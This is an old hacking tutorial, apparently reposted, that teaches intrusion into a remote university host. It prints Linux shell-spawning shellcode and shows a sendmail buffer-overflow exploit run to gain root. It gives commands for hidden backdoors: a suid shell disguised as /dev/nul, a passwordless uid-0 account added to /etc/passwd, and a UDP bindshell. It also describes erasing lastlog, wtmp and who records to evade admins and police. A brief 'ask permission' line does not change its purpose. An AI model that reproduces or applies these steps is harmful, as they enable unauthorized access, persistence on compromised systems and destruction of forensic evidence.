      The most standar and easy to use exploits are buffer overflows.

      I won't explain here how a buffer overflow does work,

      Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.

      You can download it from my site. (www.3b0x.com)

      Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.

      This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell

      is different to every OS, so this is a strong reason to know what OS they're running.

      We edit the .c file we've downloaded and look for something like this:

      char shellcode[] =

      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

      This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

      You gotta replace it by the shellcode for the OS your target is running.

      You can find shellcodes for most OSes on my site or create your own by reading

      the text i mentioned before (Smash The Stack For Fun And Profit).

      IMPORTANT: before continuing with the practice, ask your target for permission to hack them.

      if they let you do it, then you shall continue.

      if they don't give you permission, STOP HERE and try with another one.

      shall you continue without their permission, you'd be inquiring law and

      i'm not responible of your craziness in any way!!!

      You should have now the shell account, this is the time to use it!

      everything i explain on this section, do it through your shell account:

      bash-2.03$ telnet myshellaccount 23

      Trying xx.xx.xx.xx...

      Connected to yourshellaccount.

      Escape character is '^]'.

      Welcome to yourshellaccount

      login: malicioususer

      Password: (it doesn't display)

      Last login: Fry Sep 15 11:45:34 from .

      sh-2.03$

      Here is a example of a buffer overflow (that doesn't really exist):

      we compile it:

      sh-2.03$ gcc exploit.c -o exploit

      we execute it:

      sh-2.03$ ./exploit

      This is a sendmail 8.9.11 exploit

      usage: ./exploit target port

      Sendmail works on port 25, so:

      sh-2.03$./exploit 25 target.edu

      Cool, '$' means we got a shell! Let's find out if we're root.

      $whoami

      root

      Damn, we've rooted target.edu!

      $whyamiroot

      because you've hacked me! :-) (just kidding)

      There are some exploits that don't give you root directly, but a normal shell.

      It depends on what luser is running the daemon. (sendmail is usually root)

      Then you'll have to upload a .c file with a local (local means it can't overflow

      a daemon, but a local program) overflow and compile it.

      Remember to avoid uploading it with FTP as you can.

      Other kind of exploit is the one that gives you access to the password file.

      If a host gots port 23 (telnet) opened, we can login as a normal user

      (remote root logins are usually not allowed) by putting his/hers/its username

      and password. Then use the su command to become root.

      sh-2.03$ telnet target.edu 23

      Trying xx.xx.xx.xx...

      Connected to target.edu.

      Escape character is '^]'.

      We're running SunOS 5.7

      Welcome to target.edu

      login: luser

      Password: (it doesn't display)

      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

      sh-2.03$ whoami

      luser

      Are we lusers?

      sh-2.03$ su root

      Password:

      Don't think so...

      sh-2.03$ whoami

      root

      sh-2.03$

      Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.

      Then, let's suppose we've extracted the password from luser and root. We can't login as

      root so we login as luser and run su. su asks us for the root password, we put it and...

      rooted!!

      The problem here is that is not easy to extract a root password from a password file.

      Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word

      or a person's name.

      I said some admins are idiot (some of them are smart), but lusers are the more most

      idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,

      you'll find that lusers set up rlogin doors for you to enter without a password, etc.

      Not to mention what happens when an admin gives a normal luser administrator priviledges

      with sudo or something.

      To learn how to crack a password file and extract its passwords, download a document called

      "cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

      Of course, I haven't listed all the exploit kinds that exist, only the most common.

      Putting backdoors

      ~~~~~~~~~~~~~~~~~

      Ok, we've rooted the system. Then what?

      Now you're able to change the webpage of that .edu box. Is that what you want to do?

      Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu

      box, but they're not ashaming them with such things.

      Hacktivism is good and respected. You can change the page of bad people with bad ideologies

      like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

      REMEMBER: ask for permission first!

      No, this time you should do another thing. You should keep that system for you to play with

      as a toy! (remember: your_box --> lame_box --> victim's box)

      Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get

      back in.

      And it may not be possible:

      - the admin changed his password to something uncrackable.

      - they updated sendmail to a newer version so the exploit doesn't work.

      So now we're root and we can do everything, we shall put some backdoors that let us get back in.

      It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)

      Anyway, i'll explain the basics of it.

      1.How to make a sushi:

      To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid

      permissions:

      sh-2.03$ cp /bin/sh /dev/nul

      In the strange case the admin looks at /dev, he wouldn't find something unusual cause

      /dev/null does exist (who notices the difference?).

      sh-2.03$ cd /dev

      sh-2.03$ chown root nul

      Should yet be root-owned, but anyway...

      sh-2.03$ chmod 4775 nul

      4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

      We've finished our 'duty', let's logout:

      sh-2.03$ exit

      Then, when we come back some day:

      sh-2.03$ whoami

      luser

      sh-2.03$ /dev/nul

      sh-2.03$ whoami

      root

      We're superluser again!

      There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.

      we'd upload then the shell we want and make a sushi with it.

      The shell we want for this is SASH. A stand-alone shell with built-in commands.

      This one doesn't drop suid perms, and the commands are built-in, so external commands

      can't drop perms too! Remember to compile it for the architecture of the target box.

      Do you know where to get sash from? From my site :-). (www.3b0x.com)

      2.How to add fake lusers.

      You gotta manipulate the users file: /etc/passwd

      try this:

      sh-2.03$ pico /etc/passwd

      if it doesn't work, try this:

      sh-2.03$ vi /etc/passwd

      Of course, you must learn how to use vi.

      This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell

      When uid=0 and gid=0, that luser gets superluser priviledges.

      Then we add a line like this:

      dood::0:0:dood:/:/bin/sh (put it in a hidden place)

      So, once we get a shell, we type:

      sh-2.03$ su dood

      sh-2.03$ whoami

      dood

      And now we're root because dood's uid=0 and gid=0.

      Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake

      program in /bin that executes the shell you want with suid perms.

      I haven't got such a program at my site, but it shouldn't be difficult to develope.

      3.How to put a bindshell.

      A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).

      The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)

      and give a shell to you when you connect. The cool thing of UDP is this:

      If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!

      They rarely remember UDP exists.

      You can get an UDP bindshell coded by !hispahack from my site.

      Cleaning up

      ~~~~~~~~~~~

      Remember when we logedin to target.edu as luser, and used su to become root?

      Take a look to this line:

      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

      Yes, that was displayed by the target box when we logedin there.

      It refers to the last login that the real luser did.

      So, what will be displayed when luser logsin again?

      Last login: Sun Sep 24 10:32:14 from .

      Then luser writes a mail to the admin:

      "It has happen some strange thing, when I loggedin today, I've read a line like this:

      Last login: Sun Sep 24 10:32:14 from .

      Does it mean I did login yesterday? It can't be, I don't work on sundays!

      I think it's a bug and this is your fault."

      The admin responds to luser:

      "That wasn't a bug! this line means someone acceded the system using your password, don't

      worry for that, we got his IP. That means we can ask his ISP what phone number did call

      at 10:32 and get . Then we shall call the police and he'll get busted"

      So you'll get busted because luser was a bit clever (sometimes happens).

      So we gotta find a way to delete that.

      This information can be stored in:

      /usr/adm/lastlog

      /var/adm/lastlog

      /var/log/lastlog

      and we can erase it using lled (get it from my site)

      lled gots a buitin help that explains how to use it, remember to chmod the fake file

      created by lled like the substitute lastlog file.

      There is also some information we'd like to erase:

      Remember when i told you not to use FTP? Well, in case you did it, you must now

      use wted to clean up. Its sintax is very similar to lled.

      you can get it from my site.

      The who command shows us (and the admin) which lusers are logedin at the moment.

      What if we login and the admin is there?

      sh-2.03$ who

      root tty1 Sep 25 18:18

      Then we shall use zap2. If you loggedin as 'luser', then type:

      sh-2.03$ ./zap2 luser

      Zap2!

      sh-2.03$ who

      sh-2.03$

      And luser has never been here.

      Greetings

      ~~~~~~~~~

      Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you

      decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)

      for more advanced tutorials so you can improve your skills.

      I'd get very happy if you send me a mail telling me your impression about this paper (wether

      is good or bad), and you help me to improve it.

      I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups

      or other tutorials like this one. thanks to all.

      This paper was written on 26-9-00 by TDC

    • Follow-Ups:

    Technorati Tags: ,,,,,,,,,,,,,,,,,,,,.